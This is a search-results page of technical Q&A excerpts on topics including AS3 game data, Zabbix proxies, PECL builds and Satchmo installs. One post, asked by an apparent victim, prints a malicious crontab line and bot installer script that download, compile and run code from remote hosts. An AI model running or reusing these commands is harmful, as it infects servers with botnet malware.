Search Results

Search found 6323 results on 253 pages for 'angularjs compile'.

Page 188/253 | < Previous Page | 184 185 186 187 188 189 190 191 192 193 194 195  | Next Page >

  • Best practice for organizing/storing character/monster data in an RPG?

    - by eclecto
    Synopsis: Attempting to build a cross-platform RPG app in Adobe Flash Builder and am trying to figure out the best class hierarchy and the best way to store the static data used to build each of the individual "hero" and "monster" types. My programming experience, particularly in AS3, is embarrassingly small. My ultra-alpha method is to include a "_class" object in the constructor for each instance. The _class, in turn, is a static Object pulled from a class created specifically for that purpose, so things look something like this: // Character.as package { public class Character extends Sprite { public var _strength:int; // etc. public function Character(_class:Object) { _strength = _class._strength; // etc. } } } // MonsterClasses.as package { public final class MonsterClasses extends Object { public static const Monster1:Object={ _strength:50, // etc. } // etc. } } // Some other class in which characters/monsters are created. // Create a new instance of Character var myMonster = new Character(MonsterClasses.Monster1); Another option I've toyed with is the idea of making each character class/monster type its own subclass of Character, but I'm not sure if it would be efficient or even make sense considering that these classes would only be used to store variables and would add no new methods. On the other hand, it would make creating instances as simple as var myMonster = new Monster1; and potentially cut down on the overhead of having to read a class containing the data for, at a conservative preliminary estimate, over 150 monsters just to fish out the one monster I want (assuming, and I really have no idea, that such a thing might cause any kind of slowdown in execution). But long story short, I want a system that's both efficient at compile time and easy to work with during coding. Should I stick with what I've got or try a different method? As a subquestion, I'm also assuming here that the best way to store data that will be bundled with the final game and not read externally is simply to declare everything in AS3. Seems to me that if I used, say, XML or JSON I'd have to use the associated AS3 classes and methods to pull in the data, parse it, and convert it to AS3 object(s) anyway, so it would be inefficient. Right?

    Read the article

  • reference list for non-IT driven algorithmic patterns

    - by Quicker
    I am looking for a reference list for non-IT driven algorithmic patterns (which still can be helped with IT implementations of IT). An Example List would be: name; short desc; reference Travelling Salesman; find the shortest possible route on a multiple target path; http://en.wikipedia.org/wiki/Travelling_salesman_problem Ressource Disposition (aka Regulation); Distribute a limited/exceeding input on a given number output receivers based on distribution rules; http://database-programmer.blogspot.de/2010/12/critical-analysis-of-algorithm-sproc.html If there is no such list, but you instantly think of something specific, please 'put it on the desk'. Maybe I can compile something out of the input I get here (actually I am very frustrated as I did not find any such list via research by myself). Details on Scoping: I found it very hard to formulate what I want in a way everything is out that I do not need (which may be the issue why I did not find anything at google). There is a database centric definition for what I am looking for in the section 'Processes' of the second example link. That somehow fits, but the database focus sort of drifts away from the pattern thinking, which I have in mind. So here are my own thoughts around what's in and what's out: I am NOT looking for a foundational algo ref list, which is implemented as basis for any programming language. Eg. the php reference describes substr and strlen. That implements algos, but is not what I am looking for. the problem the algo does address would even exist, if there were no computers (or other IT components) the main focus of the algo is NOT to help other algo's chances are high, that there are implementions of the solution or any workaround without any IT support out there in the world however the algo could be benefitialy implemented/fully supported by a software application = means: the problem of the algo has to be addressed anyway, but running an algo implementation with software automates the process (that is why I posted it on stackoverflow and not somewhere else) typically such algo implementations have more than one input field value and more than one output field value - which implies it could not be implemented as simple function (which is fixed to produce not more than one output value) in a normalized data model often times such algo implementation outputs span accross multiple rows (sometimes multiple tables), whereby the number of output rows depends on the input paraters and rows in the table(s) at start time - which implies that any algo implementation/procedure must interact with a database (read and/or write) I am mainly looking for patterns, not for specific implementations. Example: The Travelling Salesman assumes any coordinates, however it does not say: You need a table targets with fields x and y. - however sometimes descriptions are focussed on examples with specific implementations very much - no worries, as long as the pattern gets clear

    Read the article

  • Threads slowing down application and not working properly

    - by Belgin
    I'm making a software renderer which does per-polygon rasterization using a floating point digital differential analyzer algorithm. My idea was to create two threads for rasterization and have them work like so: one thread draws each even scanline in a polygon and the other thread draws each odd scanline, and they both start working at the same time, but the main application waits for both of them to finish and then pauses them before continuing with other computations. As this is the first time I'm making a threaded application, I'm not sure if the following method for thread synchronization is correct: First of all, I use two global variables to control the two threads, if a global variable is set to 1, that means the thread can start working, otherwise it must not work. This is checked by the thread running an infinite loop and if it detects that the global variable has changed its value, it does its job and then sets the variable back to 0 again. The main program also uses an empty while to check when both variables become 0 after setting them to 1. Second, each thread is assigned a global structure which contains information about the triangle that is about to be rasterized. The structures are filled in by the main program before setting the global variables to 1. My dilemma is that, while this process works under some conditions, it slows down the program considerably, and also it fails to run properly when compiled for Release in Visual Studio, or when compiled with any sort of -O optimization with gcc (i.e. nothing on screen, even SEGFAULTs). The program isn't much faster by default without threads, which you can see for yourself by commenting out the #define THREADS directive, but if I apply optimizations, it becomes much faster (especially with gcc -Ofast -march=native). N.B. It might not compile with gcc because of fscanf_s calls, but you can replace those with the usual fscanf, if you wish to use gcc. Because there is a lot of code, too much for here or pastebin, I created a git repository where you can view it. My questions are: Why does adding these two threads slow down my application? Why doesn't it work when compiling for Release or with optimizations? Can I speed up the application with threads? If so, how? Thanks in advance.

    Read the article

  • How to properly document functionality in an agile project?

    - by RoboShop
    So recently, we've just finished the first phase of our project. We used agile with fortnightly sprints. And whilst the application turned out well, we're now turning our eyes on some of the maintenance tasks. One maintenance task is that all of our documentation appears in the form of specs. These specs describe 1 or more stories and generally are a body of work which a few devs could knock over in a week. For development, that works really well - every two weeks, the devs get handed a spec and it's a nice discrete chunk of work that they can just do. From a documentation point of view, this has become a mess. The problem with writing specs that are focused on delivering just-in-time requirements to developers is we haven't placed much emphasis on the big picture. Specs come from all different angles - it could be describing a standard function, it could describing parts of a workflow, it could be describing a particular screen... And now, we have business rules about our application scattered across 120 documents. Looking for any document for a particular business rule or function in particular is quite hard because you don't know which document has this information, and making a change request is equally hard because once again, we are unsure about which spec to make the change. So we have maybe a couple of weeks of lull before it's back to specing out functionality for the next phase but in this time, I'd like to re-visit our processes. I think the way we have worked so far in terms of delivering fortnightly specs works well. But we also need a way to manage our documentation so that our business rules for a given function / workflow are easy to locate / change. I have two ideas. One is we compile all of our specs into a series of master specs broken by a few broad functional areas. The specs describe the sprint, the master spec describe the system. The only problem I can see is 1) Our existing 120 specs are not all neatly defined into broad functional areas. Some will require breaking up, merging etc. which will take a lot of time. 2) We'll be writing specs and updating master specs in each new sprint. Seems like double the work, and then do the devs look at the spec or the master spec? My other suggestion is to concede that our documentation is too big of a mess, and manage that mess going forward. So we go through each spec, assign like keywords to it, and then when we want to search for a function, we search for that keyword. Problems I can see 1) Still the problem of business rules scattered everywhere, keywords just make it easier to find it. anyway, if anyone has any decent ideas or any experience to share about how best to manage documentation, would really appreciate it.

    Read the article

  • Unable to install SQL 2008 on Windows 7

    - by Axel
    SQL 2008 install hangs on Windows 7 The story: Trying to install SQL2008 on Windows 7 hangs on SqlEngineDBStartconfigAction_install_configrc_Cpu32. What I Tried: Uninstall hangs on validation Manual uninstall using msiinv.exe and msiexec /x works Added SQL service accounts to local admins no help Turn of UAC no help Last lines in setup log: 2010-04-01 16:18:05 SQLEngine: : Checking Engine checkpoint 'GetSqlServerProcessHandle' 2010-04-01 16:18:05 SQLEngine: --SqlServerServiceSCM: Waiting for nt event 'Global\sqlserverRecComplete' to be created 2010-04-01 16:18:07 SQLEngine: --SqlServerServiceSCM: Waiting for nt event 'Global\sqlserverRecComplete' or sql process handle to be signaled 2010-04-01 16:18:07 SQLEngine: : Checking Engine checkpoint 'WaitSqlServerStartEvents' 2010-04-01 16:18:53 Slp: Sco: Attempting to initialize script 2010-04-01 16:18:53 Slp: Sco: Attempting to initialize default connection string 2010-04-01 16:18:53 Slp: Sco: Attempting to set script connection protocol to NotSpecified 2010-04-01 16:18:53 Slp: Sco: Attempting to set script connection protocol to NamedPipes 2010-04-01 16:18:53 SQLEngine: --SqlDatabaseServiceConfig: Connection String: Data Source=\\.\pipe\SQLLocal\MSSQLSERVER;Initial Catalog=master;Integrated Security=True;Pooling=False;Network Library=dbnmpntw;Application Name=SqlSetup 2010-04-01 16:18:53 SQLEngine: : Checking Engine checkpoint 'ServiceConfigConnect' 2010-04-01 16:18:53 SQLEngine: --SqlDatabaseServiceConfig: Connecting to SQL.... 2010-04-01 16:18:53 Slp: Sco: Attempting to connect script 2010-04-01 16:18:53 Slp: Connection string: Data Source=\\.\pipe\SQLLocal\MSSQLSERVER;Initial Catalog=master;Integrated Security=True;Pooling=False;Network Library=dbnmpntw;Application Name=SqlSetup And now comes the fun part: When I open conf mgr I can see the service running, I enabled named pipes and TCP/IP, restarted the service I'm able to connect to the server using an OLE DB connection but not with the Native Client. And what I find suspicious is the following error in my app log: .NET Runtime Optimization Service (clr_optimization_v2.0.50727_32) - Failed to compile: C:\Program Files\Microsoft SQL Server\100\Tools\Binn\VSShell\Common7\Tools\VDT\DataProjects.dll . Error code = 0x8007000b In MS connect this is reported as a bug but MS is unable to reproduce the problem altough when you search the fora I'm not the only one with this problem. So any help is appreciated.

    Read the article

  • Is SecureShellz bot a virus? How does it work?

    - by ProGNOMmers
    I'm using a development server in which I found this in the crontab: [...] * * * * * /dev/shm/tmp/.rnd >/dev/null 2>&1 @weekly wget http://stablehost.us/bots/regular.bot -O /dev/shm/tmp/.rnd;chmod +x /dev/shm/tmp/.rnd;/dev/shm/tmp/.rnd [...] http://stablehost.us/bots/regular.bot contents are: #!/bin/sh if [ $(whoami) = "root" ]; then echo y|yum install perl-libwww-perl perl-IO-Socket-SSL openssl-devel zlib1g-dev gcc make echo y|apt-get install libwww-perl apt-get install libio-socket-ssl-perl openssl-devel zlib1g-dev gcc make pkg_add -r wget;pkg_add -r perl;pkg_add -r gcc wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o a a.c;mv a /lib/xpath.so;chmod +x /lib/xpath.so;/lib/xpath.so;rm -rf a.c wget -q http://linksys.secureshellz.net/bots/b -O /lib/xpath.so.1;chmod +x /lib/xpath.so.1;/lib/xpath.so.1 wget -q http://linksys.secureshellz.net/bots/a -O /lib/xpath.so.2;chmod +x /lib/xpath.so.2;/lib/xpath.so.2 exit 1 fi wget -q http://linksys.secureshellz.net/bots/a.c -O a.c;gcc -o .php a.c;rm -rf a.c;chmod +x .php; ./.php wget -q http://linksys.secureshellz.net/bots/a -O .phpa;chmod +x .phpa; ./.phpa wget -q http://linksys.secureshellz.net/bots/b -O .php_ ;chmod +x .php_;./.php_ I cannot contact the sysadmin for various reasons, so I cannot ask infos about this to him. It seems to me this script downloads some remote C source codes and binaries, compile them and execute them. I am a web developer, so I am not an expert about C language, but watching at the downloaded files it seems to me a bot injected in the cron of the server. Can you give me more infos about what this code does? About its working, its purposes?

    Read the article

  • How config nginx to serve flv video streaming with JWplayer

    - by Nisanio
    I need to serve flv files from one server, and show those videos on a web page located in another server, with JWPlayer. I already config nginx with the flv module, an put this on nginx.conf location ~ \.flv$ { flv; } The code I use in the jwplayer is <object id="player" classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" name="player" width="328" height="200"> <param name="movie" value="player.swf" /> <param name="allowfullscreen" value="true" /> <param name="allowscriptaccess" value="always" /> <param name="flashvars" value="file=http://XX.XX.XX.XX/vid5.flv&image=preview2.jpg" /> <embed type="application/x-shockwave-flash" id="player2" name="player2" src="player.swf" width="630" height="385" allowscriptaccess="always" allowfullscreen="true" flashvars="file=http://XX.XX.XX.XX/vid5.flv&image=preview2.jpg" /> </object> Where XX.XX.XX.XX is the ip address of the server (we'll config an appropiate domain, but first i have to make the whole thing works :) ) The problem is that nothing happen. I don't know what to do next, all the articles on the internet only talks about how compile the flv module (already done) and add the nginx.conf lines. Any help would be greatly appreciate Thanks in advance

    Read the article

  • Pecl complies .so extensions for OSX built-in PHP and not MAMP

    - by Camsoft
    I've installed the sphinx binaries and libraries and am now trying to install the PECL sphinx module. My system is running OS X 10.6 with MAMP 1.8.2 installed. I try to install sphinx using the following command: sudo pecl install sphinx The PECL command outputs the following: running: phpize Configuring for: PHP Api Version: 20090626 Zend Module Api No: 20090626 Zend Extension Api No: 220090626 The versions above don't match the versions listed when doing a phpinfo(). It seems that PECL is trying to complie against the built-in version of PHP. If I ignore the errors and continue the it will successfully compile and place the sphinx.so file in: /usr/lib/php/extensions/no-debug-non-zts-20090626/sphinx.so when in fact it should be: /Applications/MAMP/bin/php5/lib/php/extensions/no-debug-non-zts-20060613/ I've tried copying the sphinx.so file to the MAMP extensions dir but when I restart apache PHP displays the following warning: PHP Startup: Unable to load dynamic library '/Applications/MAMP/bin/php5/lib/php/extensions/no-debug-non-zts-20060613/sphinx.so I think this is because MAMP is 32bit and the built-in PHP is 64bit so PECL complies for 64bit. I might be completely wrong but I did read this when I goggled on the topic. Does anyone know how to get PECL to map to the MAMP version of PHP instead of the built-in version?

    Read the article

  • Zabbix Proxy not collecting data

    - by Jordan Eunson
    I have a working Zabbix 1.8.2 server collecting data for our office and our colo facility. However the link between the colo and office is flaky. What I'm trying to do is setup a proxy on the colo side to have a 1 hour cache and relay the data to our primary server at the office. Our zabbix server is compiled from source and uses a mysql database I've followed the instructions found in the zabbix documentation to compile the proxy using a sqlite3 database. I add the proxy to zabbix under Administration-DM-Proxies. The zabbix server "sees" the proxy because the "last seen" field is always under 60s. However when I assign a colo host to the proxy I stop receiving data from it. The colo host's zabbix_agentd.log file says this: 29343:20100622:124847 Timeout while answering request 29343:20100622:124847 Getting list of active checks failed. Will retry after 60 seconds The zabbix_proxy.log says this. 2041:20100622:123131.760 Deleted 0 records from history [0.000994 seconds] 2028:20100622:124131.671 Error while receiving answer from server [ZBX_TCP_READ() failed I also am unable to receive any SNMP data which is more important to me than the zabbix agent data. Has anyone had this problem before? Zabbix Server OS: CentOS5.4 Zabbix Server Build: 1.8.2 from source Zabbix Proxy OS: CentOS5.4 Zabbix Proxy Build: 1.8.2 from source P.S. The SQLite database on the zabbix proxy never gets any data written to it, it is identical to when I created it from the blank schema in zabbix-1.8.2/create/schema. (Yes I've checked the permissions)

    Read the article

  • mysql-python on Snow Leopard with MySQL 64-bit

    - by Derek Reynolds
    Can't seem to get mysql-python to work on Snow Leopard for the life of me. Currently using the default version of python that ships with Snow Leopard (python 2.6.1). Installed MySQL 5.1.45 x86_64. I download the source for mysql-python http://sourceforge.net/projects/mysql-python/ and compile with the following commands: tar xzf MySQL-python-1.2.3c1.tar.gz cd MySQL-python-1.2.3c1 ARCHFLAGS='-arch x86_64' python setup.py build ARCHFLAGS='-arch x86_64' python setup.py install And am getting the following error when I try to import: Python 2.6.1 (r261:67515, Jul 7 2009, 23:51:51) [GCC 4.2.1 (Apple Inc. build 5646)] on darwin Type "help", "copyright", "credits" or "license" for more information. >>> import MySQLdb Traceback (most recent call last): File "<stdin>", line 1, in <module> File "build/bdist.macosx-10.6-universal/egg/MySQLdb/__init__.py", line 19, in <module> File "build/bdist.macosx-10.6-universal/egg/_mysql.py", line 7, in <module> File "build/bdist.macosx-10.6-universal/egg/_mysql.py", line 6, in __bootstrap__ ImportError: dlopen(/Users/derek/.python-eggs/MySQL_python-1.2.3c1-py2.6-macosx-10.6-universal.egg-tmp/_mysql.so, 2): no suitable image found. Did find: /Users/derek/.python-eggs/MySQL_python-1.2.3c1-py2.6-macosx-10.6-universal.egg-tmp/_mysql.so: mach-o, but wrong architecture Any ideas? Or the best route for starting over.

    Read the article

  • To install Markdown's extensions by Python

    - by Masi
    The installation notes (git://gitorious.org/python-markdown/mainline.git) say in the file using_as_module.txt One of the parameters that you can pass is a list of Extensions. Extensions must be available as python modules either within the markdown.extensions package or on your PYTHONPATH with names starting with mdx_, followed by the name of the extension. Thus, extensions=['footnotes'] will first look for the module markdown.extensions.footnotes, then a module named mdx_footnotes. See the documentation specific to the extension you are using for help in specifying configuration settings for that extension. I put the folder "extensions" to ~/bin/python/ such that my PYTHONPATH is the following export PYTHONPATH=/Users/masi/bin/python/:/opt/local/Library/Frameworks/Python.framework/Versions/2.6/ The instructions say that I need to import the addons such that import markdown import <module-name> However, I cannot see any module in my Python. This suggests me that the extensions are not available as "python modules - - on [my] PYTHONPATH with names starting with mdx_ - -." How can you get Markdown's extensions to work? 2nd attempt I run at ~/bin/markdown git clone git://gitorious.org/python-markdown/mainline.git python-markdown cd python-markdown python setup.py install I put the folder /Users/masi/bin/markdown/python-markdown/build to my PATH because the installation message suggests me that is the new location of the extensions. I have the following in a test markdown -document [TOC] -- headings here with # -format --- However, I do not get the table of contents. This suggests me that we need to somehow activate the extensions when we compile by the markdown.py -script. **The problem returns to my first quoted text which I is rather confusing to me.

    Read the article

  • Error In centos6 while compiling java classes,in tomcat6

    - by AJIT RANA
    I am newbie to Linux and Centos6. I bought server just now and want to deploy my web app in it. I am getting error while I am compiling my servlet classes. It showing me bash: javac: command not found when I try to compile my classes. But when I checked my class in '/usr/lib/jvm/java-1.6.0/bin .'I found my javac there. Then I checked javac with the help of command ./javac i got ERROR.. [root:ip_address.com]# ./javac There is insufficient memory for the Java Runtime Environment to continue. pthread_getattr_np Error occurred during initialization of VM java.lang.OutOfMemoryError: unable to create new native thread I followed the step as shown in "" Java outofmemoryerror when creating <100 threads "" which shows me command to get limits.. '[root:ipaddress.com]# ulimit -a core file size (blocks, -c) unlimited data seg size (kbytes, -d) unlimited scheduling priority (-e) 0 file size (blocks, -f) unlimited pending signals (-i) 278528 max locked memory (kbytes, -l) 32 max memory size (kbytes, -m) unlimited open files (-n) 1024 pipe size (512 bytes, -p) 8 POSIX message queues (bytes, -q) 819200 real-time priority (-r) 0 stack size (kbytes, -s) 10240 cpu time (seconds, -t) unlimited max user processes (-u) 1024 virtual memory (kbytes, -v) unlimited file locks (-x) unlimited' [root:ipaddress.com]# top bash: top: command not found link :- http://stackoverflow.com/q/12913857/1746764

    Read the article

  • Problems during an update of cPanel / WHM

    - by haron
    I ordered a Master WHM account with the couple CentOS / cPanel. whm-cpanel.eu.pn The installation is a fresh update of the basic services was necessary (had: WHM 11.15.0 cPanel 11.17.0 WHM X v3.1.0, Apache 1.3.37, PHP 4.4.7, MySQL 4.1.22). 1 / I started to update cPanel / WHM via the command: / scripts / upcp. Everything went well until the middle of installing the server stopped responding (or ping, or ssh). The installation appears to have continued alone to the end and after some time everything is back to normal (I do not know if there was a reboot) and my interface was updated (cPanel 11.24.4-R36167 - WHM 11.24.2 - X 3.9). 2 / Then I updated via the MySQL interface tweak this in WHM then the command: / scripts / mysqlup. Here everything went fine, no problem. 3 / Finally, I wanted to upgrade Apache 2.2 / PHP 5 and I used this command: / scripts / easyapache. After selecting all the packages and modules installation is started but the same as for point 1: the server did not answer more and this time the installation did not go through. Apache 2.2 is well spent (after the second try) but PHP has remained at 4. I tried several times the same operation without success. I do not think this is a memory problem, a free-m shortly before losing communications gave nothing alarming. By cons CPU time seemed to rise up. I reinstalled the machine again the trick, same problem! Whether via the WHM interface or by Shell, the installation stops short, for 15 minutes the machine is not responding and then everything returns to normal, but no update is done in PHP. Is there a known bug in this version of cPanel / WHM? Someone he met the same problem? If I compile Apache / PHP manually, without using the script easyapache is what I might encounter problems with cPanel later? Thank you!

    Read the article

  • How can I install Satchmo?

    - by Jonathan Hayward
    I am trying to install Satchmo 0.9 on an Ubuntu 9.10 guest off of the instructions at http://bitbucket.org/chris1610/satchmo/downloads/Satchmo.pdf. I run into difficulties at 2.1.2: pip install -r http://bitbucket.org/chris1610/satchmo/raw/tip/scripts/requirements.txt pip install -e hg+http://bitbucket.org/chris1610/satchmo/@v0.9#egg=satchmo The first command fails because a compile error for how it's trying to build PIL. So I ran an "aptitude install python-imaging", locally copy the first line's requirements.text, and remove the line that's unsuccessfully trying to build PIL. The first line completes without error, as does the second. The next step tells me to change directory to the /path/to/new/store, and run: python clonesatchmo.py A little bit of trouble here; I am told that clonesatchmo.py will be in /bin by now, and it isn't there, but I put some Satchmo stuff under /usr/local, create a symlink in /bin, and run: python /bin/clonesatchmo.py This gives: jonathan@ubuntu:~/store$ python /bin/clonesatchmo.py Creating the Satchmo Application Traceback (most recent call last): File "/bin/clonesatchmo.py", line 108, in <module> create_satchmo_site(opts.site_name) File "/bin/clonesatchmo.py", line 47, in create_satchmo_site import satchmo_skeleton ImportError: No module named satchmo_skeleton A find after apparently checking out the repository reveals that there is no file with a name like satchmo*skeleton* on my system. I thought that bash might be prone to take part of the second pip invocation's URL as the beginning of a comment; I tried both: pip install -e hg+http://bitbucket.org/chris1610/satchmo/@v0.9\#egg=satchmo pip install -e hg+http://bitbucket.org/chris1610/satchmo/@v0.9#egg=satchmo Neither way of doing it seems to take care of the import error mentioned above. How can I get a Satchmo installation under Ubuntu, or at least enough of a Satchmo installation that I am able to start with a skeleton of a store and then flesh it out the way I want? Thanks, Jonathan

    Read the article

  • Where to get glib-config for Kubuntu?

    - by Carl Smotricz
    I'm trying to compile Midnight Commander on a KUbuntu 9.10 (Karmic) box with no root access. I've set up a directory under $HOME, downloaded the mc source package and various stuff required for building, such as autotools. I've unpacked the CONTENTS of all those packages into this working directory such that I have the usual ./usr, ./lib, ./etc hierarchy. I manage to get configure through a lot of tests, but I can't seem to fool it into finding glib. checking for glib-2.0... checking for glib-config... no checking for glib12-config... no checking for glib-config... no checking for GLIB - version >= 1.2.6... no *** The glib-config script installed by GLIB could not be found *** If GLIB was installed in PREFIX, make sure PREFIX/bin is in *** your path, or set the GLIB_CONFIG environment variable to the *** full path to glib-config. configure: error: Test for glib failed. GNU Midnight Commander requires glib 1.2.6 or above. My system has glib installed: /lib/libglib-2.0.so.0 /lib/libglib-2.0.so.0.2200.3 ... and I've also downloaded and unpacked the glib package into my working directory: libglib2.0-0_2.22.2-0ubuntu1_i386.deb libglib2.0-dev_2.22.2-0ubuntu1_i386.deb ... but still the elusive glib-config is nowhere to be found. It's not in any debian package for Karmic, either. So I'd appreciate any help getting over this hurdle. Please note, again, that I don't have root, so I can't just merrily apt-get stuff.

    Read the article

  • How to install VMware tools for Ubuntu 11.04 hosted on VMware ESXi?

    - by Dmitri Toubelis
    I'm running Vmware ESX 4.1 and I have a development VM that I recently upgraded from Ubuntu 10.04 to 11.04. Then I tried to re-install VMware Tools and some of the modules gave me an error and would not compile. As a result I'm having problems with backing up this virtual machine now and I suspect VMware tools is the reason. I installed latest patches for VMware host, that included an update to VMware Tools (v8.3.7 build-381511) but I'm still getting the same error. The error I'm getting is like this: ... /tmp/vmware-root/modules/vmhgfs-only/super.c:73:4: error: unknown field \u2018clear_inode\u2019 specified in initializer make[2]: *** [/tmp/vmware-root/modules/vmhgfs-only/super.o] Error 1 make[1]: *** [_module_/tmp/vmware-root/modules/vmhgfs-only] Error 2 make[1]: Leaving directory `/usr/src/linux-headers-2.6.38-8-generic' make: *** [vmhgfs.ko] Error 2 make: Leaving directory `/tmp/vmware-root/modules/vmhgfs-only' and also this: /tmp/vmware-root/modules/vmci-only/vmci_drv.c:91:4: error: unknown field \u2018ioctl\u2019 specified in initializer /tmp/vmware-root/modules/vmci-only/vmci_drv.c:91:4: warning: initialization from incompatible pointer type /tmp/vmware-root/modules/vmci-only/vmci_drv.c: In function \u2018vmci_init\u2019: /tmp/vmware-root/modules/vmci-only/vmci_drv.c:151:4: error: implicit declaration of function \u2018init_MUTEX\u2019 make[2]: *** [/tmp/vmware-root/modules/vmci-only/vmci_drv.o] Error 1 make[1]: *** [_module_/tmp/vmware-root/modules/vmci-only] Error 2 make[1]: Leaving directory `/usr/src/linux-headers-2.6.38-8-generic' make: *** [vmci.ko] Error 2 make: Leaving directory `/tmp/vmware-root/modules/vmci-only' Any ideas?

    Read the article

  • Hylafax: Encounter "No font metric information" when try to send a fax

    - by Chau Chee Yang
    I am using Hylafax 6.0.5 on Fedora 13 x86_64. As there are no rpm package available for Fedora 13, I use the source tar ball to install hylafax myself. Everything seems fine during compile and install. I try to send a fax with sendfax and encounter error: # sendfax -n -d <fax-number> /etc/passwd /usr/local/sbin/textfmt: No font metric information found for "Courier-Bold". Usage: /usr/local/sbin/textfmt [-1] [-2] [-B] [-c] [-D] [-f fontname] [-F fontdir(s)] [-m N] [-o #] [-p #] [-r] [-U] [-Ml=#,r=#,t=#,b=#] [-V #] files... >out.ps Default options: -f Courier -1 -p 11bp -o 0 Error converting document; command was "/usr/local/sbin/textfmt -B -f Courier-Bold -Ml=0.4in -p 11 -s default >'/tmp//sndfaxp5GdJ9' <'/etc/passwd'" It seems like there is problem with font problem. I have ghostscript-fonts installed too. I can't find hyla.conf in path /etc/hylafax. There is no /etc/hylafax path in my file system. All configuration files seems located in /var/spool/hylafax/etc. Please advice. Thank you.

    Read the article

  • Can't install py-subversion on freebsd 8.2

    - by max taldykin
    I'm trying to install python bindings for subversion: # cd /usr/ports/devel/py-subversion # make ===> Patching for py26-subversion-1.6.15 ===> Applying extra patch /usr/ports/devel/py-subversion/../../devel/subversion/files /bindings-patch-subversion--bindings--swig--perl--native--Makefile.PL.in cannot open /usr/ports/devel/py-subversion/../../devel/subversion/files/bindings-patch-subversion--bindings--swig--perl--native--Makefile.PL.in: No such file or directory *** Error code 2 Yes, there is no such file in subversion/files, but there is file patch-subversion::bindings::swig::perl::natives::Makefle.PL.in (with colons instead of hyphens). After renaming and rerunning make I got another error: # make ===> Patching for py26-subversion-1.6.15 ===> Applying extra patch /usr/ports/devel/py-subversion/../../devel/subversion/files/bindings-patch-subversion--bindings--swig--perl--native--Makefile.PL.in cannot open /usr/ports/devel/py-subversion/../../devel/subversion/files/bindings-patch-subversion--bindings--swig--perl--native--Makefile.PL.in: No such file or directory *** Error code 2 But now there is nothing like bindings-* in subversion/files. So, the question is why is it so and how can I install py-subversion? PS: FreeBSD is running on virtual private server, so I think it is somehow patched. # uname -a FreeBSD mskhug.ru 8.2-PRERELEASE FreeBSD 8.2-PRERELEASE #0 r50: Thu Feb 24 10:15:34 IRKT 2011 [email protected]:/root/src/sys/amd64/compile/DEBUG amd64

    Read the article

  • How can I install Satchmo?

    - by Jonathan Hayward
    I am trying to install Satchmo 0.9 on an Ubuntu 9.10 32-bit guest off of the instructions at http://bitbucket.org/chris1610/satchmo/downloads/Satchmo.pdf. I run into difficulties at 2.1.2: pip install -r http://bitbucket.org/chris1610/satchmo/raw/tip/scripts/requirements.txt pip install -e hg+http://bitbucket.org/chris1610/satchmo/@v0.9#egg=satchmo The first command fails because a compile error for how it's trying to build PIL. So I ran an "aptitude install python-imaging", locally copy the first line's requirements.text, and remove the line that's unsuccessfully trying to build PIL. The first line completes without reported error, as does the second. The next step tells me to change directory to the /path/to/new/store, and run: python clonesatchmo.py A little bit of trouble here; I am told that clonesatchmo.py will be in /bin by now, and it isn't there, but I put some Satchmo stuff under /usr/local, create a symlink in /bin, and run: python /bin/clonesatchmo.py This gives: jonathan@ubuntu:~/store$ python /bin/clonesatchmo.py Creating the Satchmo Application Traceback (most recent call last): File "/bin/clonesatchmo.py", line 108, in <module> create_satchmo_site(opts.site_name) File "/bin/clonesatchmo.py", line 47, in create_satchmo_site import satchmo_skeleton ImportError: No module named satchmo_skeleton A find after apparently checking out the repository reveals that there is no file with a name like satchmo*skeleton* on my system. I thought that bash might be prone to take part of the second pip invocation's URL as the beginning of a comment; I tried both: pip install -e hg+http://bitbucket.org/chris1610/satchmo/@v0.9\#egg=satchmo pip install -e hg+http://bitbucket.org/chris1610/satchmo/@v0.9#egg=satchmo Neither way of doing it seems to take care of the import error mentioned above. How can I get a Satchmo installation under Ubuntu, or at least enough of a Satchmo installation that I am able to start with a skeleton of a store and then flesh it out the way I want? Thanks, Jonathan

    Read the article

  • apache pointing to the wrong version of python on ubuntu how do I change?

    - by one
    I am setting up a flask application on and Ubuntu 12.04.3 LTS EC2 instance and everything seemed to be working well (i.e. I could get to the webpage via the publicly available url) until I tried to import a module (e.g. numpy) and realised the apache python differs from the one I used to compile the mod_wsgi and also the one I am using I am running apache2. The apache2 logs show the warnings (specifically the last line shows the path hasnt changed): [warn] mod_wsgi: Compiled for Python/2.7.5. [warn] mod_wsgi: Runtime using Python/2.7.3. [warn] mod_wsgi: Python module path '/usr/lib/python2.7/:/usr/lib/python2.7/plat-linux2:/usr/lib/python2.7/lib-tk:/usr/lib$ I have tried to set the path in my virtual host conf (my python is located in /home/ubuntu/anaconda/bin along with all of the other libraries): WSGIPythonHome /home/ubuntu/anaconda WSGIPythonPath /home/ubuntu/anaconda <VirtualHost *:80> ServerName xx-xx-xxx-xxx-xxx.compute-1.amazonaws.com ServerAdmin [email protected] WSGIScriptAlias / /var/www/microblog/microblog.wsgi <Directory /var/www/microblog/app/> Order allow,deny Allow from all </Directory> Alias /static /var/www/microblog/app/static <Directory /var/www/FlaskApp/FlaskApp/static/> Order allow,deny Allow from all </Directory> ErrorLog ${APACHE_LOG_DIR}/error.log LogLevel warn CustomLog ${APACHE_LOG_DIR}/access.log combined </VirtualHost> But I still get the warnings and the apache python path hasnt changed - where do I need to put the relevant directives to point apache at my python version and modules (e.g. scipy, numpy etc)? Separately, could I have avoided this using virtual environments? Thanks in advance.

    Read the article

  • Installer not being updated ( probably because of Windows 7 file cache )

    - by Sithu Kyaw
    I'm creating an installer for my Visual FoxPro application using ISTool and Inno Setup. It is ok for me for the first time. But, I updated my code and re-built the EXE file. Then, compiled the installer again. I found that my update was not compiled into the installer and I did not see the update in my running application. I noticed that the EXE file, which was built by VFP, was updated properly. It seems the installation script did not output the updated file. But, when I changed folder names, it did work. I don't want to change folder names whenever I run that installation script. It is not a good idea actually. I think it is because of Windows 7 cache system. Mine is Windows 7 Home Premium Service Pack 1. For example, My previous output file is located at C:\path\to\myinstaller.exe When I compile the installation script, the output file there should be overwritten, but it was not as expected. Although I deleted the file, it did not work. When I changed to output file path as C:\newpath\to\myinstaller.exe, I got the fix, but it is not a solution what I'm looking for. Does anyone how to do that? [Edit] I found that the installed directory was not updated properly. For example, I installed the program to C:\Program files\MyInstalledApp When I run the installer again, that installation directory should be overwritten, but failed. Thus, I got to uninstall the app before I re-install it. Is there any fix for this?

    Read the article

  • I need advices: small memory footprint linux mail server with spam filtering

    - by petermolnar
